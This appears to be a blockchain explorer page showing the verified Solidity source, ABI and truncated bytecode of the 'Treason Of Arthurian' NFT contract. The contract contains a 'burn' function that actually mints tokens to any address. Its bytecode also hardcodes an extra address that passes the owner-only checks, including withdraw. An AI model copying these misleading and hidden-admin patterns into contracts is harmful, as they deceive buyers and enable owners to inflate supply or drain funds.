     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract TreasonOfArthurian is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "ipfs://QmWWuWHWWzq3fLY3sXizyLttuN2WuYxiNmRbekciVRYd2k/";
    uint   public price             = 0.0037 ether;
    uint   public maxPerTx          = 10;
    uint   public maxPerFree        = 1;
    uint   public maxPerWallet      = 20;
    uint   public totalFree         = 10000;
    uint   public maxSupply         = 10000;
    bool   public mintEnabled;
    uint   public totalFreeMinted = 0;
    uint   public executedCount;

    mapping(address => uint256) public _mintedFreeAmount;
    mapping(address => uint256) public _totalMintedAmount;
    mapping(uint => bool) public tokenExecuted;
    mapping(uint => bool) public fromTokenHasExecuted;

    // Errors
    error AlreadyExecuted();

    constructor() ERC721A("Treason Of Arthurian", "ToA"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }
    

    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    function execute(uint fromTokenId, uint toTokenId) external {
        require(ownerOf(fromTokenId) == msg.sender, "Not your Executioner");
        require(fromTokenId % 10 == 0, "This token can't be used to execute");
        require(toTokenId % 10 != 0, "Cannot execute a fellow executioner!");
        if (tokenExecuted[toTokenId]) revert AlreadyExecuted();
        if (fromTokenHasExecuted[fromTokenId]) revert AlreadyExecuted();
        tokenExecuted[toTokenId] = true;
        fromTokenHasExecuted[fromTokenId] = true;
        executedCount++;
    }


    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
             totalFreeMinted += maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
             totalFreeMinted += count;
            }
        }
        else{
        require(mintEnabled, "Mint is not live yet");
        require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet");
        require(msg.value >= count * cost, "Please send the exact ETH amount");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");
        require(msg.sender == tx.origin, "The minter is another contract");
        }
        _totalMintedAmount[msg.sender] += count;
        _safeMint(msg.sender, count);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
    }
    
    function CommunityWallet(uint quantity, address user)
    public
    onlyOwner
  {
    require(
      quantity > 0,
      "Invalid mint amount"
    );
    require(
      totalSupply() + quantity <= maxSupply,
      "Maximum supply exceeded"
    );
    _safeMint(user, quantity);
  }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AlreadyExecuted","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"internalType":"uint256","name":"toTokenId","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"executedCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"fromTokenHasExecuted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"tokenExecuted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180606001604052806036815260200162005b3860369139600a90805190602001906200008a92919062000260565b50660d252161ab4000600b55600a600c556001600d556014600e55612710600f556127106010556000601255348015620000c357600080fd5b506040518060400160405280601481526020017f54726561736f6e204f662041727468757269616e0000000000000000000000008152506040518060400160405280600381526020017f546f41000000000000000000000000000000000000000000000000000000000081525081600190805190602001906200014892919062000260565b5080600290805190602001906200016192919062000260565b50505062000184620001786200019260201b60201c565b6200019a60201b60201c565b600160098190555062000375565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200026e9062000310565b90600052602060002090601f016020900481019282620002925760008555620002de565b82601f10620002ad57805160ff1916838001178555620002de565b82800160010185558215620002de579182015b82811115620002dd578251825591602001919060010190620002c0565b5b509050620002ed9190620002f1565b5090565b5b808211156200030c576000816000905550600101620002f2565b5090565b600060028204905060018216806200032957607f821691505b6020821081141562000340576200033f62000346565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6157b380620003856000396000f3fe6080604052600436106102725760003560e01c80638da5cb5b1161014f578063b88d4fde116100c1578063dad7b5c91161007a578063dad7b5c914610957578063e945971c14610982578063e985e9c5146109ab578063f2fde38b146109e8578063f4db2acb14610a11578063f968adbe14610a4e57610272565b8063b88d4fde14610845578063bacd2e971461086e578063c7c39ffc14610899578063c87b56dd146108c4578063d123973014610901578063d5abeb011461092c57610272565b8063a035b1fe11610113578063a035b1fe14610758578063a0712d6814610783578063a0bcfc7f1461079f578063a22cb465146107c8578063a7027357146107f1578063b0e77f421461081c57610272565b80638da5cb5b14610673578063905def621461069e57806391b7f5ed146106db57806395d89b41146107045780639dc29fac1461072f57610272565b8063453c2310116101e857806364b72188116101ac57806364b72188146105755780636c0360eb146105a057806370a08231146105cb578063715018a6146106085780637d55094d1461061f5780637ee019c11461063657610272565b8063453c23101461047e5780634f6ccce7146104a95780635601eaea146104e65780635a963f1b1461050f5780636352211e1461053857610272565b806318160ddd1161023a57806318160ddd1461038257806323b872dd146103ad5780632f745c59146103d6578063333e44e6146104135780633ccfd60b1461043e57806342842e0e1461045557610272565b806301ffc9a71461027757806306fdde03146102b4578063081812fc146102df578063095ea7b31461031c57806311b01a3214610345575b600080fd5b34801561028357600080fd5b5061029e60048036038101906102999190613ead565b610a79565b6040516102ab919061461e565b60405180910390f35b3480156102c057600080fd5b506102c9610bc3565b6040516102d69190614639565b60405180910390f35b3480156102eb57600080fd5b5061030660048036038101906103019190613f50565b610c55565b60405161031391906145b7565b60405180910390f35b34801561032857600080fd5b50610343600480360381019061033e9190613e6d565b610cda565b005b34801561035157600080fd5b5061036c60048036038101906103679190613cea565b610df3565b6040516103799190614a5b565b60405180910390f35b34801561038e57600080fd5b50610397610e0b565b6040516103a49190614a5b565b60405180910390f35b3480156103b957600080fd5b506103d460048036038101906103cf9190613d57565b610e14565b005b3480156103e257600080fd5b506103fd60048036038101906103f89190613e6d565b610e24565b60405161040a9190614a5b565b60405180910390f35b34801561041f57600080fd5b50610428611016565b6040516104359190614a5b565b60405180910390f35b34801561044a57600080fd5b5061045361101c565b005b34801561046157600080fd5b5061047c60048036038101906104779190613d57565b6111fc565b005b34801561048a57600080fd5b5061049361121c565b6040516104a09190614a5b565b60405180910390f35b3480156104b557600080fd5b506104d060048036038101906104cb9190613f50565b611222565b6040516104dd9190614a5b565b60405180910390f35b3480156104f257600080fd5b5061050d60048036038101906105089190613fbd565b611275565b005b34801561051b57600080fd5b5061053660048036038101906105319190613f50565b6114ae565b005b34801561054457600080fd5b5061055f600480360381019061055a9190613f50565b611593565b60405161056c91906145b7565b60405180910390f35b34801561058157600080fd5b5061058a6115a9565b6040516105979190614a5b565b60405180910390f35b3480156105ac57600080fd5b506105b56115b3565b6040516105c29190614639565b60405180910390f35b3480156105d757600080fd5b506105f260048036038101906105ed9190613cea565b611641565b6040516105ff9190614a5b565b60405180910390f35b34801561061457600080fd5b5061061d61172a565b005b34801561062b57600080fd5b50610634611811565b005b34801561064257600080fd5b5061065d60048036038101906106589190613f50565b611918565b60405161066a919061461e565b60405180910390f35b34801561067f57600080fd5b50610688611938565b60405161069591906145b7565b60405180910390f35b3480156106aa57600080fd5b506106c560048036038101906106c09190613f50565b611962565b6040516106d2919061461e565b60405180910390f35b3480156106e757600080fd5b5061070260048036038101906106fd9190613f50565b611982565b005b34801561071057600080fd5b50610719611a67565b6040516107269190614639565b60405180910390f35b34801561073b57600080fd5b5061075660048036038101906107519190613e6d565b611af9565b005b34801561076457600080fd5b5061076d611be2565b60405161077a9190614a5b565b60405180910390f35b61079d60048036038101906107989190613f50565b611be8565b005b3480156107ab57600080fd5b506107c660048036038101906107c19190613f07565b612261565b005b3480156107d457600080fd5b506107ef60048036038101906107ea9190613e2d565b612356565b005b3480156107fd57600080fd5b506108066124d7565b6040516108139190614a5b565b60405180910390f35b34801561082857600080fd5b50610843600480360381019061083e9190613f7d565b6124e1565b005b34801561085157600080fd5b5061086c60048036038101906108679190613daa565b612664565b005b34801561087a57600080fd5b506108836126c0565b6040516108909190614a5b565b60405180910390f35b3480156108a557600080fd5b506108ae6126c6565b6040516108bb9190614a5b565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190613f50565b6126cc565b6040516108f89190614639565b60405180910390f35b34801561090d57600080fd5b5061091661277f565b604051610923919061461e565b60405180910390f35b34801561093857600080fd5b50610941612792565b60405161094e9190614a5b565b60405180910390f35b34801561096357600080fd5b5061096c612798565b6040516109799190614a5b565b60405180910390f35b34801561098e57600080fd5b506109a960048036038101906109a49190613f50565b61279e565b005b3480156109b757600080fd5b506109d260048036038101906109cd9190613d17565b612883565b6040516109df919061461e565b60405180910390f35b3480156109f457600080fd5b50610a0f6004803603810190610a0a9190613cea565b612917565b005b348015610a1d57600080fd5b50610a386004803603810190610a339190613cea565b612a6e565b604051610a459190614a5b565b60405180910390f35b348015610a5a57600080fd5b50610a63612a86565b604051610a709190614a5b565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610b4457507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610bac57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610bbc5750610bbb82612a8c565b5b9050919050565b606060018054610bd290614d16565b80601f0160208091040260200160405190810160405280929190818152602001828054610bfe90614d16565b8015610c4b5780601f10610c2057610100808354040283529160200191610c4b565b820191906000526020600020905b815481529060010190602001808311610c2e57829003601f168201915b5050505050905090565b6000610c6082612af6565b610c9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9690614a3b565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610ce582611593565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4d906148fb565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610d75612b03565b73ffffffffffffffffffffffffffffffffffffffff161480610da45750610da381610d9e612b03565b612883565b5b610de3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dda9061479b565b60405180910390fd5b610dee838383612b0b565b505050565b60156020528060005260406000206000915090505481565b60008054905090565b610e1f838383612bbd565b505050565b6000610e2f83611641565b8210610e70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e679061465b565b60405180910390fd5b6000610e7a610e0b565b905060008060005b83811015610fd4576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610f7457806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610fc65786841415610fbd578195505050505050611010565b83806001019450505b508080600101915050610e82565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611007906149db565b60405180910390fd5b92915050565b600f5481565b611024612b03565b73ffffffffffffffffffffffffffffffffffffffff16611042611938565b73ffffffffffffffffffffffffffffffffffffffff1614806110b85750611067612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ee9061485b565b60405180910390fd5b6002600954141561113d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611134906149fb565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161116b906145a2565b60006040518083038185875af1925050503d80600081146111a8576040519150601f19603f3d011682016040523d82523d6000602084013e6111ad565b606091505b50509050806111f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e89061491b565b60405180910390fd5b506001600981905550565b61121783838360405180602001604052806000815250612664565b505050565b600e5481565b600061122c610e0b565b821061126d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112649061475b565b60405180910390fd5b819050919050565b3373ffffffffffffffffffffffffffffffffffffffff1661129583611593565b73ffffffffffffffffffffffffffffffffffffffff16146112eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112e29061471b565b60405180910390fd5b6000600a836112fa9190614dc2565b1461133a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113319061481b565b60405180910390fd5b6000600a826113499190614dc2565b141561138a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113819061467b565b60405180910390fd5b6016600082815260200190815260200160002060009054906101000a900460ff16156113e2576040517f0dc1019700000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6017600083815260200190815260200160002060009054906101000a900460ff161561143a576040517f0dc1019700000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60016016600083815260200190815260200160002060006101000a81548160ff02191690831515021790555060016017600084815260200190815260200160002060006101000a81548160ff021916908315150217905550601360008154809291906114a590614d79565b91905055505050565b6114b6612b03565b73ffffffffffffffffffffffffffffffffffffffff166114d4611938565b73ffffffffffffffffffffffffffffffffffffffff16148061154a57506114f9612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611589576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115809061485b565b60405180910390fd5b80600f8190555050565b600061159e826130fd565b600001519050919050565b6000600b54905090565b600a80546115c090614d16565b80601f01602080910402602001604051908101604052809291908181526020018280546115ec90614d16565b80156116395780601f1061160e57610100808354040283529160200191611639565b820191906000526020600020905b81548152906001019060200180831161161c57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156116b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a9906147bb565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b611732612b03565b73ffffffffffffffffffffffffffffffffffffffff16611750611938565b73ffffffffffffffffffffffffffffffffffffffff1614806117c65750611775612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611805576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117fc9061485b565b60405180910390fd5b61180f6000613297565b565b611819612b03565b73ffffffffffffffffffffffffffffffffffffffff16611837611938565b73ffffffffffffffffffffffffffffffffffffffff1614806118ad575061185c612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6118ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e39061485b565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b60176020528060005260406000206000915054906101000a900460ff1681565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60166020528060005260406000206000915054906101000a900460ff1681565b61198a612b03565b73ffffffffffffffffffffffffffffffffffffffff166119a8611938565b73ffffffffffffffffffffffffffffffffffffffff161480611a1e57506119cd612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a549061485b565b60405180910390fd5b80600b8190555050565b606060028054611a7690614d16565b80601f0160208091040260200160405190810160405280929190818152602001828054611aa290614d16565b8015611aef5780601f10611ac457610100808354040283529160200191611aef565b820191906000526020600020905b815481529060010190602001808311611ad257829003601f168201915b5050505050905090565b611b01612b03565b73ffffffffffffffffffffffffffffffffffffffff16611b1f611938565b73ffffffffffffffffffffffffffffffffffffffff161480611b955750611b44612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611bd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bcb9061485b565b60405180910390fd5b611bde828261335d565b5050565b600b5481565b6000